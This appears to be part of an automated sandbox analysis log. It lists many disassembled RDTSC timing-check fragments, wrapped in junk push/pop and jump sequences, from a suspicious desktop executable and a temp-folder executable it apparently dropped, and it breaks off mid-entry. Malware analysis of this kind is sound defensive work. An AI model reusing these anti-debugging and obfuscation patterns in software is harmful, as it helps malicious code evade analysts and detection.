Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C045A second address: 48C04B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 call 00007FEDA531E8CFh 0x0000000b pop eax 0x0000000c pushfd 0x0000000d jmp 00007FEDA531E8D9h 0x00000012 add ax, C2F6h 0x00000017 jmp 00007FEDA531E8D1h 0x0000001c popfd 0x0000001d popad 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FEDA531E8CDh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C04B3 second address: 48C04CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ecx, edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C04CE second address: 48C04FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEDA531E8CFh 0x0000000b popad 0x0000000c xchg eax, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEDA531E8D5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C057E second address: 48C0584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0584 second address: 48C0588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0588 second address: 48C05C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a jmp 00007FEDA51D0EBFh 0x0000000f je 00007FEDA51D1056h 0x00000015 pushad 0x00000016 mov dx, si 0x00000019 popad 0x0000001a lea ecx, dword ptr [ebp-14h] 0x0000001d jmp 00007FEDA51D0EBAh 0x00000022 mov dword ptr [ebp-14h], edi 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 mov ecx, 17F29A93h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C060D second address: 48C0620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 27h 0x00000005 mov si, 56A7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0620 second address: 48C0624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0624 second address: 48C062A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C062A second address: 48C063A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA51D0EBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C06B5 second address: 48C06B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C06B9 second address: 48C06C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C06C7 second address: 48C06D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA531E8CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C06D9 second address: 48C06DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C06DD second address: 48C07A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FEE1667C66Dh 0x0000000e jmp 00007FEDA531E8D7h 0x00000013 js 00007FEDA531E905h 0x00000019 jmp 00007FEDA531E8D6h 0x0000001e cmp dword ptr [ebp-14h], edi 0x00000021 jmp 00007FEDA531E8D0h 0x00000026 jne 00007FEE1667C630h 0x0000002c jmp 00007FEDA531E8D0h 0x00000031 mov ebx, dword ptr [ebp+08h] 0x00000034 jmp 00007FEDA531E8D0h 0x00000039 lea eax, dword ptr [ebp-2Ch] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007FEDA531E8CDh 0x00000045 sbb esi, 19147D16h 0x0000004b jmp 00007FEDA531E8D1h 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007FEDA531E8D0h 0x00000057 adc cx, 3938h 0x0000005c jmp 00007FEDA531E8CBh 0x00000061 popfd 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C07A9 second address: 48C0846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 jmp 00007FEDA51D0EBBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f jmp 00007FEDA51D0EC6h 0x00000014 push eax 0x00000015 jmp 00007FEDA51D0EBBh 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c movzx ecx, di 0x0000001f call 00007FEDA51D0EC1h 0x00000024 mov dx, cx 0x00000027 pop ecx 0x00000028 popad 0x00000029 push ebp 0x0000002a pushad 0x0000002b push ecx 0x0000002c mov ecx, ebx 0x0000002e pop edx 0x0000002f pushad 0x00000030 mov esi, 759D84B3h 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 popad 0x00000039 mov dword ptr [esp], eax 0x0000003c pushad 0x0000003d mov ebx, eax 0x0000003f mov ecx, 0A3E025Dh 0x00000044 popad 0x00000045 xchg eax, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov cx, di 0x0000004c pushfd 0x0000004d jmp 00007FEDA51D0EC1h 0x00000052 and ah, FFFFFFA6h 0x00000055 jmp 00007FEDA51D0EC1h 0x0000005a popfd 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C08D0 second address: 48C08D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C08D5 second address: 48C002A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEDA51D0EC5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, eax 0x0000000e jmp 00007FEDA51D0EBEh 0x00000013 test esi, esi 0x00000015 pushad 0x00000016 mov ebx, eax 0x00000018 mov si, 7209h 0x0000001c popad 0x0000001d je 00007FEE1652EC00h 0x00000023 xor eax, eax 0x00000025 jmp 00007FEDA51AA5EAh 0x0000002a pop esi 0x0000002b pop edi 0x0000002c pop ebx 0x0000002d leave 0x0000002e retn 0004h 0x00000031 nop 0x00000032 cmp eax, 00000000h 0x00000035 setne cl 0x00000038 xor ebx, ebx 0x0000003a test cl, 00000001h 0x0000003d jne 00007FEDA51D0EB7h 0x0000003f jmp 00007FEDA51D102Bh 0x00000044 call 00007FEDA8ADA155h 0x00000049 mov edi, edi 0x0000004b jmp 00007FEDA51D0EC1h 0x00000050 xchg eax, ebp 0x00000051 pushad 0x00000052 mov ax, 1B43h 0x00000056 pushad 0x00000057 mov ecx, 027265B5h 0x0000005c push ecx 0x0000005d pop edi 0x0000005e popad 0x0000005f popad 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C002A second address: 48C002E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C002E second address: 48C0032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0032 second address: 48C0038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0038 second address: 48C00A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEDA51D0EC6h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov ecx, 1DB425BDh 0x00000017 pushfd 0x00000018 jmp 00007FEDA51D0EBAh 0x0000001d sbb si, 4198h 0x00000022 jmp 00007FEDA51D0EBBh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ecx 0x0000002a jmp 00007FEDA51D0EC6h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C00A1 second address: 48C00A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C00A7 second address: 48C00AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C00AD second address: 48C00B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C00FC second address: 48C0117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0CF3 second address: 48C0CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0CF7 second address: 48C0D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 cmp dword ptr [75C7459Ch], 05h 0x00000010 jmp 00007FEDA51D0EC6h 0x00000015 je 00007FEE1651EB98h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx ebx, ax 0x00000021 pushfd 0x00000022 jmp 00007FEDA51D0EC6h 0x00000027 adc cx, C918h 0x0000002c jmp 00007FEDA51D0EBBh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0D52 second address: 48C0D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEDA531E8CFh 0x00000008 pop esi 0x00000009 push ebx 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEDA531E8CEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0DD7 second address: 48C0E5C instructions: 0x00000000 rdtsc 0x00000002 mov cx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 jmp 00007FEDA51D0EC3h 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007FEDA51D0EC9h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 jmp 00007FEDA51D0EC1h 0x00000026 pop eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007FEDA51D0EC3h 0x0000002f call 00007FEDA51D0EC8h 0x00000034 pop ecx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0E5C second address: 48C0E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA531E8D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0E77 second address: 48C0E8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FEE16525BA9h 0x0000000d push 75C12B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75C74538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0E8A second address: 48C0E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0E8E second address: 48C0E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0E92 second address: 48C0E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0E98 second address: 48C0EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA51D0EC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0EB0 second address: 48C0EC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, 00000000h 0x0000000d pushad 0x0000000e mov dx, si 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E08B0 second address: 48E08E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEDA51D0EC1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov si, bx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E08E6 second address: 48E0936 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEDA531E8D5h 0x00000008 sbb ax, AA96h 0x0000000d jmp 00007FEDA531E8D1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FEDA531E8D8h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0936 second address: 48E093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E093A second address: 48E0940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0940 second address: 48E0951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA51D0EBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0951 second address: 48E0994 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEDA531E8CCh 0x00000013 sbb ecx, 56B42F78h 0x00000019 jmp 00007FEDA531E8CBh 0x0000001e popfd 0x0000001f movzx ecx, di 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0994 second address: 48E0998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0998 second address: 48E099E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E099E second address: 48E0A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEDA51D0EC4h 0x00000009 adc esi, 48E25908h 0x0000000f jmp 00007FEDA51D0EBBh 0x00000014 popfd 0x00000015 movzx ecx, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, esi 0x0000001c jmp 00007FEDA51D0EBBh 0x00000021 mov esi, dword ptr [ebp+0Ch] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007FEDA51D0EC2h 0x0000002d add ecx, 703C0E98h 0x00000033 jmp 00007FEDA51D0EBBh 0x00000038 popfd 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0A05 second address: 48E0A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0A09 second address: 48E0A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEDA51D0EC7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0A2D second address: 48E0A5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 251ED31Ah 0x00000008 call 00007FEDA531E8CBh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007FEE1664C239h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEDA531E8D2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0A5E second address: 48E0AC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEDA51D0EC1h 0x00000008 call 00007FEDA51D0EC0h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 cmp dword ptr [75C7459Ch], 05h 0x00000018 jmp 00007FEDA51D0EC1h 0x0000001d je 00007FEE165168AFh 0x00000023 jmp 00007FEDA51D0EBEh 0x00000028 xchg eax, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jmp 00007FEDA51D0EBDh 0x00000031 mov esi, 4EA746B7h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0AC9 second address: 48E0AF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 jmp 00007FEDA531E8D4h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEDA531E8CEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0B48 second address: 48E0B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0B4C second address: 48E0B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0B50 second address: 48E0B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0B56 second address: 48E0B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA531E8CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48E0BA1 second address: 48E0BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA51D0EBCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BCF41A second address: BCF423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD304E second address: BD3052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD3052 second address: BD3066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD3066 second address: BD306C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD306C second address: BD30F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA531E8D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FEDA531E8C8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov ecx, 3EC9C8F5h 0x0000002d mov dword ptr [ebp+122D2847h], ecx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FEDA531E8C8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov dword ptr [ebp+122D2291h], eax 0x00000055 mov edx, dword ptr [ebp+122D283Fh] 0x0000005b call 00007FEDA531E8C9h 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jl 00007FEDA531E8C6h 0x0000006a rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD30F1 second address: BD30F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD30F7 second address: BD312F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007FEDA531E8D0h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEDA531E8D5h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD312F second address: BD3135 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD3135 second address: BD3151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEDA531E8D8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD3151 second address: BD3161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD3161 second address: BD316B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FEDA531E8C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD316B second address: BD3180 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEDA51D0EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD3180 second address: BD31E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEDA531E8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FEDA531E8D2h 0x0000000f popad 0x00000010 pop eax 0x00000011 mov dx, 5D6Eh 0x00000015 push 00000003h 0x00000017 and ecx, 6D0968BDh 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007FEDA531E8C8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov ecx, dword ptr [ebp+122D2FDDh] 0x0000003f jng 00007FEDA531E8C6h 0x00000045 push 00000003h 0x00000047 push 98C30AC1h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 